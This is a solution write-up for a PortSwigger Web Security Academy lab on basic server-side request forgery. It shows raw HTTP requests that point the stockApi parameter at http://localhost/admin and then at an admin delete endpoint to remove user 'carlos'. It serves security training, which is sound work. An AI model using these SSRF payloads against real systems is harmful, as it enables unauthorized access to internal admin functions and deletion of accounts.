Port Swigger Basic SSRF against the local server

Basic SSRF against the local server

Solution

Open the website: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product?productId=1

https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product?productId=1

Edit stockAPI

Edit stockAPI from stockApi=http%3A%2F%2Fstock.weliketoshop.net%3A8080%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1 to http://localhost/admin
---
POST /product/stock HTTP/2
Host: 0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Cookie: session=EUT2OhAA0xXkxLMoOcPqVOsS3OMaF1Ax
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Origin: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://localhost/admin

Delete user: carlos as user admin

Open website and delete user carlos
---
https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product/stock
---
POST /product/stock HTTP/2
Host: 0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Cookie: session=EUT2OhAA0xXkxLMoOcPqVOsS3OMaF1Ax
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: https://0aa200ef04c8083a83b11428002000cf.web-security-academy.net
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

stockApi=http://localhost/admin/delete?username=carlos

Solved